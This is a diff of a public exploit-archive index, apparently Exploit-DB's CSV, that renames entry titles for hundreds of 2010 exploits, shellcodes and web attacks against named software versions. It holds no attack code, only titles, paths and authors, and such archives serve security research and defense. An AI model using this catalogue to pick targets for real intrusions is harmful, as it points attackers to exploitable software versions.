14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 -14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OS X) - Remote Code Execution",2010-06-28,dookie,osx,remote,0 +14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OSX) - Remote Code Execution",2010-06-28,dookie,osx,remote,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",php,webapps,0 14295,platforms/windows/dos/14295.html,"Microsoft - MSHTML.dll CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta ",windows,dos,0 -14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH Buffer Overflow",2010-06-28,chap0,windows,local,0 +14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript - (ypncat_id) SQL Injection",2010-06-29,v3n0m,php,webapps,0 @@ -12453,7 +12454,7 @@ id,file,description,date,author,platform,type,port 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0 -14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System - Upload",2010-07-04,Sid3^effects,php,webapps,0 +14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0 14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0 @@ -12475,7 +12476,7 @@ id,file,description,date,author,platform,type,port 14181,platforms/windows/remote/14181.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 -14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 +14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0 @@ -12484,7 +12485,7 @@ id,file,description,date,author,platform,type,port 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 -14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 +14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0 14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0 @@ -12499,7 +12500,7 @@ id,file,description,date,author,platform,type,port 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0 14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0 -14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - Buffer Overflow Exploit (Windows 7 ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0 +14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0 14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0 14213,platforms/php/webapps/14213.txt,"Joomla Component SEF (com_sef) - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0 @@ -12536,7 +12537,7 @@ id,file,description,date,author,platform,type,port 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 -14254,platforms/osx/remote/14254.py,"Apple Mac OS X (Snow Leopard) EvoCam Web Server - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"Apple Mac OSX (Snow Leopard) EvoCam Web Server - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 @@ -12545,7 +12546,7 @@ id,file,description,date,author,platform,type,port 14260,platforms/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,php,webapps,0 14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 -14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 +14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0 14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla Component - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 @@ -12553,7 +12554,7 @@ id,file,description,date,author,platform,type,port 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms - (theme) Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps,0 -14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OS X Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 +14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Exploit",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 @@ -12569,7 +12570,7 @@ id,file,description,date,author,platform,type,port 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0 -14293,platforms/php/webapps/14293.txt,"Minify4Joomla - File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0 +14293,platforms/php/webapps/14293.txt,"Minify4Joomla - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0 14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0 14434,platforms/php/webapps/14434.txt,"Joomla Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection",2010-07-10,v3n0m,php,webapps,0 @@ -12583,10 +12584,10 @@ id,file,description,date,author,platform,type,port 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0 -14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Upload",2010-07-10,Sid3^effects,php,webapps,0 +14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 -14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 +14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 @@ -12640,13 +12641,13 @@ id,file,description,date,author,platform,type,port 14387,platforms/multiple/remote/14387.html,"Safari Browser 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0 -14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script - Upload",2010-07-17,Sid3^effects,php,webapps,0 +14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script - Arbitrary File Upload",2010-07-17,Sid3^effects,php,webapps,0 14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0 14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps,0 14393,platforms/php/webapps/14393.txt,"Calendarix - 'cal_cat.php' SQL Injection",2010-07-17,SixP4ck3r,php,webapps,0 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 -14397,platforms/windows/local/14397.rb,"MoreAmp - SEH Buffer Overflow (Metasploit)",2010-07-17,Madjix,windows,local,0 +14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0 14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 @@ -12655,15 +12656,15 @@ id,file,description,date,author,platform,type,port 14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 -14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 +14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta - Denial of Service (PoC)",2010-07-18,loneferret,windows,dos,0 -14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 +14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure",2010-07-18,kingcope,aix,remote,0 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0 14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Denial of Service Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 -14415,platforms/php/webapps/14415.html,"EZ-osCommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 -14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 +14415,platforms/php/webapps/14415.html,"EZ-osCommerce 3.1 - Arbitrary File Upload",2010-07-20,indoushka,php,webapps,0 +14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0 14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,asp,webapps,0 14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 14423,platforms/php/webapps/14423.txt,"Joomla Component com_spa - SQL Injection",2010-07-20,"ALTBTA ",php,webapps,0 @@ -12674,7 +12675,7 @@ id,file,description,date,author,platform,type,port 14428,platforms/windows/local/14428.py,"QQPlayer - '.asx' File Processing Buffer Overflow",2010-07-21,"Li Qingshan",windows,local,0 14431,platforms/windows/local/14431.py,"QQPlayer - '.cue' File Buffer Overflow",2010-07-21,"Lufeng Li",windows,local,0 14432,platforms/php/webapps/14432.txt,"OpenX - (phpAdsNew) Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps,0 -14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Remote File Upload",2010-07-21,H-SK33PY,php,webapps,0 +14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts - Arbitrary File Upload",2010-07-21,H-SK33PY,php,webapps,0 14433,platforms/windows/local/14433.pl,"ZipCentral - '.zip' Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0 @@ -12693,7 +12694,7 @@ id,file,description,date,author,platform,type,port 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 -14452,platforms/linux/dos/14452.txt,"ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 +14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 @@ -12721,7 +12722,7 @@ id,file,description,date,author,platform,type,port 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0 @@ -12735,7 +12736,7 @@ id,file,description,date,author,platform,type,port 14502,platforms/php/webapps/14502.txt,"Joomla Component (com_beamospetition) - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0 14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0 -14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 +14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow (SEH)",2010-07-30,loneferret,windows,remote,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service",2010-07-30,Madjix,windows,dos,0 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,windows,remote,0 14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service",2010-08-02,s-dz,windows,dos,0 @@ -12777,7 +12778,7 @@ id,file,description,date,author,platform,type,port 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 -14573,platforms/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",linux,dos,0 +14573,platforms/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' Null Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",linux,dos,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 @@ -12799,7 +12800,7 @@ id,file,description,date,author,platform,type,port 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit",2010-08-10,sud0,windows,remote,0 -14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow (PoC)",2010-08-10,anonymous,windows,dos,0 +14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 @@ -12823,7 +12824,7 @@ id,file,description,date,author,platform,type,port 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",multiple,webapps,80 -14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow",2010-08-12,Dr_IDE,windows,local,0 +14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' Buffer Overflow (SEH)",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow",2010-08-13,corelanc0d3r,windows,local,0 14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - '.m3u' Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 @@ -12840,7 +12841,7 @@ id,file,description,date,author,platform,type,port 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)",2010-08-14,fdiskyou,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0 14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 -14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow Exploit",2010-08-15,dijital1,windows,local,0 +14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH)",2010-08-15,dijital1,windows,local,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0 @@ -12879,7 +12880,7 @@ id,file,description,date,author,platform,type,port 14702,platforms/php/webapps/14702.txt,"Joomla Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0 -14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service",2010-08-21,l3D,windows,dos,0 +14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex Interrupting) Denial of Service",2010-08-21,l3D,windows,dos,0 14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection",2010-08-22,L1nK,asp,webapps,0 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service",2010-08-23,41.w4r10r,windows,dos,0 @@ -12957,7 +12958,7 @@ 